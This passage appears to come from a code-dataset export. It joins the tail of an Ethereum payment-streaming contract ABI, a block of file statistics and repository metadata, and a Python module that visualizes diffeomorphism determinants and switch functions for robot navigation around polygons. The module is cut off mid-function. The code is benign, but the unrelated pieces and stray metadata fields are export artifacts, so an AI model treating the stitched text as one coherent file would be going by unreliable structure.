'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'interestOf', 'outputs': [{'internalType': 'uint256', 'name': 'senderInterest', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientInterest', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'sablierInterest', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 
'function'}, {'constant': True, 'inputs': [{'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}], 'name': 'getEarnings', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'view', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}], 'name': 'createStream', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'address', 'name': 'recipient', 'type': 'address'}, {'internalType': 'uint256', 'name': 'deposit', 'type': 'uint256'}, {'internalType': 'address', 'name': 'tokenAddress', 'type': 'address'}, {'internalType': 'uint256', 'name': 'startTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'stopTime', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'senderSharePercentage', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'recipientSharePercentage', 'type': 'uint256'}], 'name': 'createCompoundingStream', 'outputs': [{'internalType': 'uint256', 'name': '', 'type': 'uint256'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}, {'internalType': 'uint256', 'name': 'amount', 'type': 'uint256'}], 'name': 'withdrawFromStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}, {'constant': False, 'inputs': [{'internalType': 'uint256', 'name': 'streamId', 'type': 'uint256'}], 'name': 
'cancelStream', 'outputs': [{'internalType': 'bool', 'name': '', 'type': 'bool'}], 'payable': False, 'stateMutability': 'nonpayable', 'type': 'function'}]
| 5,741
| 12,110
| 0.622975
| 2,015
| 22,964
| 7.097767
| 0.064516
| 0.09614
| 0.1576
| 0.080199
| 0.906377
| 0.880506
| 0.843658
| 0.818277
| 0.782058
| 0.776605
| 0
| 0.028539
| 0.090577
| 22,964
| 3
| 12,111
| 7,654.666667
| 0.656292
| 0
| 0
| 0
| 0
| 0
| 0.584567
| 0.010843
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ad7b20f12ec0a1801bda8b7dbb52ac70129dde8f
| 85,404
|
py
|
Python
|
src/libraries/visualization.py
|
vvasilo/semnav
|
e1141035fa4ea8ad3d5f077198a141209693625b
|
[
"MIT"
] | 10
|
2020-02-28T22:26:55.000Z
|
2021-12-14T08:34:18.000Z
|
src/libraries/visualization.py
|
KodlabPenn/semnav
|
489cfe203516e359cc488740b99c8e208a757c2d
|
[
"MIT"
] | 1
|
2020-08-24T23:37:51.000Z
|
2021-11-10T14:29:34.000Z
|
src/libraries/visualization.py
|
vvasilo/semnav
|
e1141035fa4ea8ad3d5f077198a141209693625b
|
[
"MIT"
] | 3
|
2020-02-27T20:22:57.000Z
|
2022-01-21T12:58:32.000Z
|
#!/usr/bin/env python
"""
MIT License (modified)
Copyright (c) 2020 The Trustees of the University of Pennsylvania
Authors:
Vasileios Vasilopoulos <vvasilo@seas.upenn.edu>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this **file** (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
# General ROS and Python imports
import struct, math, numpy, os, sys, scipy, time, random
import matplotlib.pyplot as plt
import shapely as sp
from matplotlib.animation import FuncAnimation
from shapely.geometry import Point, LineString
from shapely.geometry.polygon import Polygon
# Reactive planner imports
from reactive_planner_lib import LIDARClass, completeLIDAR2D, compensateObstacleLIDAR2D, readLIDAR2D
from reactive_planner_lib import polygonDiffeoTriangulation, polygonDiffeoConvex, diffeoTreeTriangulation, diffeoTreeConvex, triangleDiffeo, polygonDiffeo, polygonImplicit, triangleSwitch, polygonSwitch
from reactive_planner_lib import localfreespaceLIDAR2D
def visualize_diffeoDeterminant_triangulation(Polygons, RobotRadius, PlotBounds, NumPoints, DiffeoParams):
"""
Function that visualizes the determinant of the diffeomorphism (based on the ear clipping method) on the plane, given a set of polygons and a robot radius
Input:
1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
2) RobotRadius: Robot radius (m)
3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
5) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
robot_radius = 0.25
bounds = numpy.array([0, 5, -3, 3])
num_points = numpy.array([101, 101])
polygon_list = []
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
polygon_list.append(xy)
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.5
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.5
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_diffeoDeterminant_triangulation(polygon_list, robot_radius, bounds, num_points, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Construct list of polygonal objects and enlarge by robot radius
polygon_list = []
for i in range(len(Polygons)):
polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
# Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
polygon_list_merged = []
i = 0
while (i<len(polygon_list)):
polygon_list_merged.append(polygon_list[i])
j = i+1
while (j<len(polygon_list)):
if polygon_list_merged[i].intersects(polygon_list[j]):
polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
del(polygon_list[j])
else:
j = j+1
polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
i = i+1
PolygonList = polygon_list_merged
# Construct list of diffeo trees for all objects
DiffeoTreeArray = []
for i in range(len(polygon_list_merged)):
coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0],polygon_list_merged[i].exterior.coords.xy[1])).transpose()
DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
# Generate x and y coordinates
x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
# Span all the points
data_points = numpy.zeros((y_coords.shape[0],x_coords.shape[0]))
for j in range(y_coords.shape[0]):
for i in range(x_coords.shape[0]):
candidate_point = Point(x_coords[i],y_coords[j])
# Check for inclusion in any of the polygons
for k in range(len(polygon_list_merged)):
if polygon_list_merged[k].contains(candidate_point):
data_points[j][i] = numpy.NAN
collision = True
break
else:
collision = False
if collision is True:
continue
else:
# Compute the actual diffeomorphism
PositionTransformed = numpy.array([[x_coords[i],y_coords[j]]])
PositionTransformedD = numpy.eye(2)
PositionTransformedDD = numpy.zeros(8)
for k in range(len(DiffeoTreeArray)):
TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
res1 = TempPositionTransformedD[0][0]*PositionTransformedDD[0] + TempPositionTransformedD[0][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res2 = TempPositionTransformedD[0][0]*PositionTransformedDD[1] + TempPositionTransformedD[0][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res3 = TempPositionTransformedD[0][0]*PositionTransformedDD[2] + TempPositionTransformedD[0][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][0] + TempPositionTransformedDD[1]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][0] + TempPositionTransformedDD[3]*PositionTransformedD[1][0])
res4 = TempPositionTransformedD[0][0]*PositionTransformedDD[3] + TempPositionTransformedD[0][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[0]*PositionTransformedD[0][1] + TempPositionTransformedDD[1]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[2]*PositionTransformedD[0][1] + TempPositionTransformedDD[3]*PositionTransformedD[1][1])
res5 = TempPositionTransformedD[1][0]*PositionTransformedDD[0] + TempPositionTransformedD[1][1]*PositionTransformedDD[4] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res6 = TempPositionTransformedD[1][0]*PositionTransformedDD[1] + TempPositionTransformedD[1][1]*PositionTransformedDD[5] + PositionTransformedD[0][0]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][0]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
res7 = TempPositionTransformedD[1][0]*PositionTransformedDD[2] + TempPositionTransformedD[1][1]*PositionTransformedDD[6] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][0] + TempPositionTransformedDD[5]*PositionTransformedD[1][0]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][0] + TempPositionTransformedDD[7]*PositionTransformedD[1][0])
res8 = TempPositionTransformedD[1][0]*PositionTransformedDD[3] + TempPositionTransformedD[1][1]*PositionTransformedDD[7] + PositionTransformedD[0][1]*(TempPositionTransformedDD[4]*PositionTransformedD[0][1] + TempPositionTransformedDD[5]*PositionTransformedD[1][1]) + PositionTransformedD[1][1]*(TempPositionTransformedDD[6]*PositionTransformedD[0][1] + TempPositionTransformedDD[7]*PositionTransformedD[1][1])
PositionTransformedDD[0] = res1
PositionTransformedDD[1] = res2
PositionTransformedDD[2] = res3
PositionTransformedDD[3] = res4
PositionTransformedDD[4] = res5
PositionTransformedDD[5] = res6
PositionTransformedDD[6] = res7
PositionTransformedDD[7] = res8
PositionTransformedD = numpy.matmul(TempPositionTransformedD, PositionTransformedD)
PositionTransformed = TempPositionTransformed
# Add the data point
data_points[j][i] = numpy.linalg.det(PositionTransformedD)
print(i+j*y_coords.shape[0])
# Plot the result
plt.imshow(numpy.log(data_points), vmin=numpy.log(data_points[~numpy.isnan(data_points)]).min(), vmax=numpy.log(data_points[~numpy.isnan(data_points)]).max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
plt.axis('off')
plt.colorbar()
plt.show()
return
def visualize_diffeoDeterminant_convex(Polygons, RobotRadius, PlotBounds, NumPoints, DiffeoParams):
    """
    Function that visualizes the determinant of the diffeomorphism Jacobian (based on the convex decomposition method) on the plane, given a set of polygons and a robot radius
    Input:
        1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
        2) RobotRadius: Robot radius (m)
        3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
        4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
        5) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        robot_radius = 0.25
        bounds = numpy.array([0, 5, -3, 3])
        num_points = numpy.array([101, 101])
        polygon_list = []
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        polygon_list.append(xy)
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.5
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.5
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_diffeoDeterminant_convex(polygon_list, robot_radius, bounds, num_points, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
    """
    # Construct list of polygonal objects and enlarge by robot radius
    polygon_list = []
    for i in range(len(Polygons)):
        polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
    # Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
    polygon_list_merged = []
    i = 0
    while i < len(polygon_list):
        polygon_list_merged.append(polygon_list[i])
        j = i+1
        while j < len(polygon_list):
            if polygon_list_merged[i].intersects(polygon_list[j]):
                polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
                polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
                del polygon_list[j]
            else:
                j = j+1
        polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
        i = i+1
    # Construct list of diffeo trees for all objects
    DiffeoTreeArray = []
    for i in range(len(polygon_list_merged)):
        coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0], polygon_list_merged[i].exterior.coords.xy[1])).transpose()
        DiffeoTreeArray.append(diffeoTreeConvex(coords, DiffeoParams))
    # Generate x and y coordinates
    x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
    y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
    # Span all the points
    data_points = numpy.zeros((y_coords.shape[0], x_coords.shape[0]))
    for j in range(y_coords.shape[0]):
        for i in range(x_coords.shape[0]):
            candidate_point = Point(x_coords[i], y_coords[j])
            # Check for inclusion in any of the polygons; for-else runs the
            # else branch only when no polygon contained the point
            for k in range(len(polygon_list_merged)):
                if polygon_list_merged[k].contains(candidate_point):
                    data_points[j][i] = numpy.nan  # numpy.NAN alias was removed in NumPy 2.0
                    break
            else:
                # Compose the Jacobian of the diffeomorphism across all trees.
                # NOTE(review): the original also chained the second derivative
                # (res1..res8 into PositionTransformedDD), but that result was
                # never read for the plotted determinant, so it is dropped here.
                PositionTransformed = numpy.array([[x_coords[i], y_coords[j]]])
                PositionTransformedD = numpy.eye(2)
                for k in range(len(DiffeoTreeArray)):
                    TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoConvex(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
                    PositionTransformedD = numpy.matmul(TempPositionTransformedD, PositionTransformedD)
                    PositionTransformed = TempPositionTransformed
                # Add the data point
                data_points[j][i] = numpy.linalg.det(PositionTransformedD)
                # Progress counter: row-major linear index (stride is the x resolution,
                # not the y resolution as in the original)
                print(i + j*x_coords.shape[0])
    # Plot the result on a log scale, ignoring NaN cells inside obstacles
    log_valid = numpy.log(data_points[~numpy.isnan(data_points)])
    plt.imshow(numpy.log(data_points), vmin=log_valid.min(), vmax=log_valid.max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
    plt.axis('off')
    plt.colorbar()
    plt.show()
    return
def visualize_lyapunov_triangulation(Polygons, RobotRadius, PlotBounds, NumPoints, Goal, DiffeoParams):
    """
    Function that visualizes a Lyapunov function candidate on the plane (based on the ear clipping method):
    the Euclidean distance between the transformed position and the transformed goal, given a set of polygons and a robot radius.
    (The original docstring said "determinant of the diffeomorphism", which is what the *_diffeoDeterminant_* functions plot.)
    Input:
        1) Polygons: Vertex Coordinates of input polygons - M-member list of Nx2 numpy.array objects (start and end vertices must be the same)
        2) RobotRadius: Robot radius (m)
        3) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
        4) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
        5) Goal: The desired navigation goal - 1x2 numpy.array
        6) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        robot_radius = 0.25
        bounds = numpy.array([0, 5, -3, 3])
        num_points = numpy.array([101, 101])
        goal = numpy.array([[0.0,0.0]])
        polygon_list = []
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        polygon_list.append(xy)
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.5
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.5
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_lyapunov_triangulation(polygon_list, robot_radius, bounds, num_points, goal, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
    """
    # Construct list of polygonal objects and enlarge by robot radius
    polygon_list = []
    for i in range(len(Polygons)):
        polygon_list.append(Polygon(Polygons[i]).buffer(RobotRadius, join_style=2))
    # Span all the found polygons to check for intersections between the known polygons and keep only the merged polygons
    polygon_list_merged = []
    i = 0
    while i < len(polygon_list):
        polygon_list_merged.append(polygon_list[i])
        j = i+1
        while j < len(polygon_list):
            if polygon_list_merged[i].intersects(polygon_list[j]):
                polygon_list_merged[i] = polygon_list_merged[i].union(polygon_list[j])
                polygon_list_merged[i] = polygon_list_merged[i].simplify(0.08, preserve_topology=True) # simplify polygon to eliminate strange small corners
                del polygon_list[j]
            else:
                j = j+1
        polygon_list_merged[i] = sp.geometry.polygon.orient(polygon_list_merged[i], 1.0) # orient polygon to be CCW
        i = i+1
    # Construct list of diffeo trees for all objects
    DiffeoTreeArray = []
    for i in range(len(polygon_list_merged)):
        coords = numpy.vstack((polygon_list_merged[i].exterior.coords.xy[0], polygon_list_merged[i].exterior.coords.xy[1])).transpose()
        DiffeoTreeArray.append(diffeoTreeTriangulation(coords, DiffeoParams))
    # Generate x and y coordinates
    x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
    y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
    # Span all the points
    data_points = numpy.zeros((y_coords.shape[0], x_coords.shape[0]))
    for j in range(y_coords.shape[0]):
        for i in range(x_coords.shape[0]):
            candidate_point = Point(x_coords[i], y_coords[j])
            # Check for inclusion in any of the polygons; for-else runs the
            # else branch only when no polygon contained the point
            for k in range(len(polygon_list_merged)):
                if polygon_list_merged[k].contains(candidate_point):
                    data_points[j][i] = numpy.nan  # numpy.NAN alias was removed in NumPy 2.0
                    break
            else:
                # Map both the grid point and the goal through all diffeo trees.
                # NOTE(review): the original also chained the Jacobian and the
                # second derivative (res1..res8); neither was read for the plotted
                # value, so that dead computation is dropped here.
                PositionTransformed = numpy.array([[x_coords[i], y_coords[j]]])
                GoalTransformed = Goal
                for k in range(len(DiffeoTreeArray)):
                    TempPositionTransformed, TempPositionTransformedD, TempPositionTransformedDD = polygonDiffeoTriangulation(PositionTransformed, DiffeoTreeArray[k], DiffeoParams)
                    TempGoalTransformed, TempGoalTransformedD, TempGoalTransformedDD = polygonDiffeoTriangulation(GoalTransformed, DiffeoTreeArray[k], DiffeoParams)
                    PositionTransformed = TempPositionTransformed
                    GoalTransformed = TempGoalTransformed
                # Add the data point: distance to the goal in the model space
                data_points[j][i] = numpy.linalg.norm(PositionTransformed[0]-GoalTransformed[0])
    # Plot the result, ignoring NaN cells inside obstacles
    valid = data_points[~numpy.isnan(data_points)]
    plt.imshow(data_points, vmin=valid.min(), vmax=valid.max(), origin='lower', extent=[PlotBounds[0], PlotBounds[1], PlotBounds[2], PlotBounds[3]])
    plt.colorbar()
    plt.show()
    return
def visualize_diffeoSwitch_triangulation(PolygonVertices, PlotBounds, NumPoints, TriangleNum, DiffeoParams):
    """
    Function that visualizes the switch function corresponding to a given polygon and a given triangle number in the tree
    Input:
        1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
        2) PlotBounds: Bounds for the planar plot - 4-member numpy.array ([xmin, xmax, ymin, ymax])
        3) NumPoints: Number of points for the generated grid in x and y - 2-member numpy.array ([x_resolution, y_resolution])
        4) TriangleNum: Number of triangle for which to visualize the switch function
        5) DiffeoParams: Options for the diffeomorphism construction
    Test:
        import numpy
        import visualization
        bounds = numpy.array([0, 5, -3, 3])
        num_points = numpy.array([101, 101])
        triangle_num = 0
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        diffeo_params = dict()
        diffeo_params['p'] = 20
        diffeo_params['epsilon'] = 1.5
        diffeo_params['varepsilon'] = 1.5
        diffeo_params['mu_1'] = 1.5
        diffeo_params['mu_2'] = 0.01
        diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
        visualization.visualize_diffeoSwitch_triangulation(xy, bounds, num_points, triangle_num, diffeo_params)
    Polygon examples to test:
        xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
        xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
        xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
        xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
        xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
        xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
        xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
    """
    # Find the tree
    tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
    # Generate x and y coordinates
    x_coords = numpy.linspace(PlotBounds[0], PlotBounds[1], NumPoints[0])
    y_coords = numpy.linspace(PlotBounds[2], PlotBounds[3], NumPoints[1])
    # Span all the points
    data_points = numpy.zeros((y_coords.shape[0], x_coords.shape[0]))
    for j in range(y_coords.shape[0]):
        for i in range(x_coords.shape[0]):
            candidate_point = numpy.array([[x_coords[i], y_coords[j]]])
            # Find the value of the switch function for the requested triangle
            sigma, sigmad, sigmadd = triangleSwitch(candidate_point, tree[TriangleNum], DiffeoParams)
            if sigma == 0. or sigma > 1:
